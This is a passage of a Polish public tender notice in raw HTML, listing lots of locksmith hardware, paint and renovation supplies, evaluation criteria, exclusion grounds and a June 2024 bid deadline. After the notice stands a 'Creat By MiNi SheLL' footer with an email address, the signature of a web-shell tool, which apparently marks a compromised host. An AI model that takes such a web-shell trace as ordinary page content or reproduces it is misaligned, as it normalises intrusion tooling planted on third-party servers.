oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR III - MATERIAŁY ŚLUSARSKIE <br/><br/>1.	Tarcza do cięcia metalu125x1 - Szt.	100<br/>2.	Brzeszczot - Szt. 100<br/>3.	Zamek drzwiowy na wkładkę 72x60 - Szt. 40<br/>4.	Zamek drzwiowy na zwykły klucz 72x60	-Szt. 40<br/>5.	Zamek drzwiowy na wkładkę 90x50	-Szt. 40<br/>6.	Zamek drzwiowy na zwykły klucz 90x50	-Szt. 40<br/>7.	Zamek wierzchni zasuwkowy bębenkowy 50mm	-Szt. 20<br/>8.	Zamek drzwiowy zasuwkowy bębenkowy 60mm	-Szt. 20<br/>9.	Zamek meblowy ZMB 1	- Szt. 50<br/>10.	Zamek meblowy ZMB 4	- Szt. 50<br/>11.	Wkładka zamka 30/35	- Szt. 50<br/>12.	Elektrody spawalnicze 3,2 mm	- kg 5<br/>13.	Klamka drzwiowa z szyldem biała	- Szt. 50<br/>14.	Szyld do zamka pod wkładkę	- Szt. 20<br/>15.	Szyld do zamka pod zwykły klucz	- Szt. 50<br/>16.	Śruby do mocowania szyldów klamka/zamek	- Szt. 50<br/>17.	Kołek rozporowy 8x50	- Szt. 300<br/>18.	Kołek rozporowy 8x40	- Szt. 300<br/>19.	Kołek rozporowy 8x80	- Szt. 300<br/>20.	Kołek rozporowy 10x50 -Szt. 300<br/>21.	Kołek rozporowy 10x60 -Szt. 300<br/>22.	Kołek rozporowy 10x80 -Szt. 300<br/>23.	Kołek rozporowy 6x50	-Szt. 300<br/>24.	Kołek rozporowy 6x60	-Szt. 300<br/>25.	Kołek rozporowy 8x80	-Szt. 300<br/>26.	Kołek rozporowy 12x 70 -Szt. 300<br/>27.	ŚrubaM6 x25	-Kg. 5<br/>28.	ŚrubaM6 x 50	-Kg. 5<br/>29.	ŚrubaM8 x 30	-Kg .8<br/>30.	ŚrubaM8 x 50	-Kg .8<br/>31.	ŚrubaM8 x 100	-Kg .6<br/>32.	ŚrubaM10 x 50	-Kg. 6<br/>33.	ŚrubaM10 x 80	-Kg. 4<br/>34.	ŚrubaM10 x 100	-Kg. 5<br/>35.	ŚrubaM12 x 100	-Kg. 8<br/>36.	Nakrętka M 6	-Kg. 6<br/>37.	Nakrętka M 8	-Kg. 6<br/>38.	Nakrętka M 10	-Kg. 6<br/>39.	Podkładka płaska M 6 -Kg. 4<br/>40.	Podkładka płaska M 8 -Kg. 4<br/>41.	Podkładka płaska M 10 -Kg. 4<br/>42.	Zawias meblowy do drzwi puszkowy 90mm	-Szt. 40<br/>43.	Zawias meblowy bolcowy 70mm -Szt.	30<br/>44.	Nakrętka m4	- kg 4<br/>45.	Podkładka płaska M4 -Szt. 4<br/>46.	Kłódka duża	- Szt. 10<br/>47.	Kłódka mała	- Szt. 10<br/>48.	WD 40	- Szt. 20<br/>49.	Papier ścierny 60	-Szt. 40<br/>50.	Papier ścierny 80	-Szt. 40<br/>51.	Papier ścierny 100	-Szt. 40<br/>52.	Gwóźdź stalowy 0,5 cala -kg 2<br/>53.	Gwóźdź stalowy 1 cal	-Kg 2<br/>54.	Klej do drewna WIKOL	-Szt .3<br/>55.	Wkręt do nidy 35x3,5	-Kg 2<br/>56.	Wkręt do nidy 45x3,5	-Kg 2<br/>57.	Wkręt do nidy 55x3,5	-Kg 2<br/>58.	Wkręt do nidy 70x3,5	-Kg 2<br/>59.	Zamek meblowy ZMB3	-Szt. 80<br/>60.	Wkładka bębenkowa 30x30 - Szt .10<br/>61.	Wkładka bębenkowa 30x35 - Szt. 10<br/>62.	Wkładka bębenkowa 30x40 - Szt. 30<br/>63.	Wkładka bębenkowa 30x50 - Szt. 10<br/>64.	Wkładka bębenkowa 30x60 - Szt. 10<br/>65.	Wkręt do nidy 25x3,5 -Kg 2<br/>66.	Nit zrywalny alum. 2mm	- Szt .200<br/>67.	Nit zrywalny alum. 3mm	- Szt. 200<br/>68.	Nit zrywalny alum. 4mm	- Szt. 200<br/>69.	Blachowkręt 30x3mm	- Szt. 200<br/>70.	Blachowkręt 30x4mm	- Szt. 200<br/>71.	Wiertła do metalu -Kpl. 5<br/>72.	Wiertła do betonu SDS	-Kpl. 5<br/>73.	Wkręt FARMER - Szt. 200<br/>74.	Tarcza do cięcia metalu 230	-Szt. 10<br/>75.	Tarcza diamentowado cięcia betonu 125 - Szt.	10<br/>76.	Tarcza diamentowa do cięcia betonu 230 - Szt. 10<br/>77.	Bity do wkrętarki - Kpl. 5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44190000-8 - Różne materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Suma punktów uzyskanych za wszystkie kryteria, stanowić będzie końcową ocenę danej oferty.<br/>Ogólna ocena oferty = ocena oferty X + termin dostawy oferty X</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR IV - MATERIAŁY REMONTOWE<br/>1.	Emulsja akrylowa - litry	600<br/>2.	Emulsja olejno - ftalowa - litry	300<br/>3.	Emulsja ceramiczna lub lateksowa - litry	300<br/>4.	Rozcieńczalnik uniwersalny - litry	100<br/>5.	Benzyna ekstrakcyjna - litry	50<br/>6.	Pigment - Szt.	100<br/>7.	Wałek malarski do emulsji szer.25 cm - Szt.	20<br/>8.	Wałek malarski do emulsji szer. 10 cm - Szt.	30<br/>10.	Wałek malarski do farby olejnej szer. 15 cm - Szt.	30<br/>11.	Wałek malarski do farby olejnej szer. 7cm - Szt.	30<br/>12.	Wałek malarski do farby olejnej szer. 10 cm - Szt.	30<br/>13.	Pędzel do malowania - ławkowiec - Szt.	15<br/>14.	Pędzel do malowania –płaski szer.20mm - Szt.	20<br/>15.	Pędzel do malowania –płaski szer.50mm - Szt.	20<br/>16.	Pędzel do malowania –płaski szer.63mm - Szt.	20<br/>17.	Pędzel do malowania grzejników 36mm - Szt.	20<br/>18.	Pędzel do malowania grzejników 50mm - Szt.	20<br/>19.	Pędzel do malowania pierścieniowy 50mm - Szt.	20<br/>20.	Pędzel do malowania pierścieniowy 30mm - Szt.	20<br/>21.	Pędzel do malowania pierścieniowy 60mm - Szt.	20<br/>22.	Szpachelka 15 cm - Szt.	20<br/>23.	Paca metalowa 25 cm - Szt.	20<br/>24.	Farba do metalu typu HAMMERITE, lub inna równoważna - litry	80<br/>25.	Szpachla gotowa gładź - Kg	500<br/>26.	Masa akrylowa - kg	20<br/>27.	Taśma do odcinania - Szt.	200<br/>28.	Nóż tapeciak - Szt.	30<br/>29.	Ostrze do tapeciaka - Szt.	500<br/>30.	Kostka do docierania 80 - Szt.	50<br/>31.	Kostka do docierania 100 - Szt.	50<br/>32.	Mieszadło - Szt.	5<br/>33.	Folia malarska - Szt.	30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44190000-8 - Różne materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Suma punktów uzyskanych za wszystkie kryteria, stanowić będzie końcową ocenę danej oferty.<br/>Ogólna ocena oferty = ocena oferty X + termin dostawy oferty X</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR V - MATERIAŁY NAPRAWCZE <br/>1.	Gładź szpachlowa - kg	500<br/>2.	Zaprawa tynkarska - Kg	200<br/>3.	Zaprawa samopoziomująca - Kg	100<br/>4.	Klej do glazury mrozoodporny - Kg	200<br/>5.	Fuga do glazury - Kg	30<br/>6.	Płyta kartonowo – gipsowa wodoodporna - Szt.	20<br/>7.	Płyta kartonowo gipsowa - Szt.	30<br/>8.	Unigrunt - litry	200<br/>9.	Papier ścierny na płótnie 100 - Szt.	200<br/>10. Papier ścierny na płótnie 80 - Szt.	200<br/>11. Papier ścierny na płótnie 120 - Szt.	200<br/>14. Zaprawa szybkowiążąca	Szt. - 100<br/>19. Kratka wentylacyjna fi 100 15x15 - Szt.	100<br/>20. Piana uszczelniająca 750 ml - Szt.	20<br/>21. Silikon wodoodporny biały - Szt.	20<br/>22. Silikon wodoodporny bezbarwny - Szt.	20<br/>23. Masa dekarska - Szt.	5<br/>24. Silikon dekarski - szt.	15<br/>25. Taśma dekarska 15 cm - szt.	10<br/>26. Narożnik aluminiowy do KG - Szt.	50<br/>27. Taśma do łączenia KG - Szt.	20<br/>28. Akryl biały - Szt.	20<br/>29. Rękawice ochronne - Para	500<br/>30. Papa termozgrzewalna - Rolka	50 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44190000-8 - Różne materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Suma punktów uzyskanych za wszystkie kryteria, stanowić będzie końcową ocenę danej oferty.<br/>Ogólna ocena oferty = ocena oferty X + termin dostawy oferty X</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy w sprawie grupy kapitałowej:<br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U.2023.1689 t.j. z dnia 2023.08.24) z innym Wykonawcą, który złożył odrębną ofertę lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ.<br/>2. Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo - jeżeli osoba/osoby podpisująca(e) ofertę działa/działają na podstawie pełnomocnictwa, to pełnomocnictwo musi zostać załączone do oferty. Z treści dokumentu pełnomocnictwa winno wynikać uprawnienie do reprezentowania Wykonawcy w postępowaniu.<br/>2. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum), do oferty powinno zostać załączone pełnomocnictwo dla Osoby Uprawnionej do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenie o niepodleganiu wykluczeniu”, o którym mowa w Rozdziale VIII ust. 1 pkt 1) SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 4 i 5 projektu umowy, stanowiącym załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/939976</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ponadto Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, wobec którego zachodzą podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022.835 z dnia 2022.04.15).<br/>2. Wykluczenie, o którym mowa w ust. 6 następuje na okres trwania określonych w nim okoliczności.<br/>3. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie ust. 6, Zamawiający odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika<br/>konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu,<br/>odrzuca wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>4. Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022.835 z dnia 2022.04.15) osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>5. Zamawiający informuje, że zgodnie z art. 7 ust. 5 ustawy, o której mowa w ust. 11, przez ubieganie się o udzielenie zamówienia publicznego rozumie się złożenie oferty.<br/>W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie okoliczności, o których mowa powyżej, Zamawiający odrzuca ofertę. Zaistnienie przesłanki wykluczenia będzie weryfikowane na podstawie ogólnodostępnych baz<br/>danych zgodnie z informacją podaną przez Urząd Zamówień Publicznych

Creat By MiNi SheLL
Email: jattceo@gmail.com